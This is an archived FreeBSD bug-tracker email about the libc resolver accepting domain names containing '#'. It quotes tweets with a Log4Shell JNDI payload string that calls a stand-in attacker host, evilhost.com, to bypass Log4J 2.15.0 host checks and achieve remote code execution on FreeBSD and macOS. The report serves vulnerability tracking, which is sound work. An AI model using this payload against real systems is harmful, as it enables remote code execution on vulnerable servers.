Date: Wed, 29 Dec 2021 01:24:29 +0000 From: bugzilla-noreply@freebsd.org To: bugs@FreeBSD.org Subject: [Bug 260770] libc resolver does not validate domain names Message-ID: <bug-260770-227-gYdtnf5L4t@https.bugs.freebsd.org/bugzilla/> In-Reply-To: <bug-260770-227@https.bugs.freebsd.org/bugzilla/> References: <bug-260770-227@https.bugs.freebsd.org/bugzilla/>
next in thread | previous in thread | raw e-mail | index | archive | help
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D260770 --- Comment #1 from Ed Maste <emaste@freebsd.org> --- Ref: https://twitter.com/marcioalm/status/1471740771581652995 > FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses ch= ecks > in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:138= 9/a} > and to bypass allowedClasses just choose a name for a class in the JDK. > Deserialization will occur as usual. #Log4Shell 1/n https://twitter.com/Shaquil86300527/status/1472153790463815680 > In my tests, this doesn=E2=80=99t work on Windows and Linux. It does work= s in MacOS and > FreeBSD. > # is not a valid for DNS but *some* resolver might query names with # in = it. > TBC for this to work the vulnerable application must run on freeBSD or Ma= cOS > and actor must control a DNS domain. --=20 You are receiving this mail because: You are the assignee for the bug.=
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-260770-227-gYdtnf5L4t>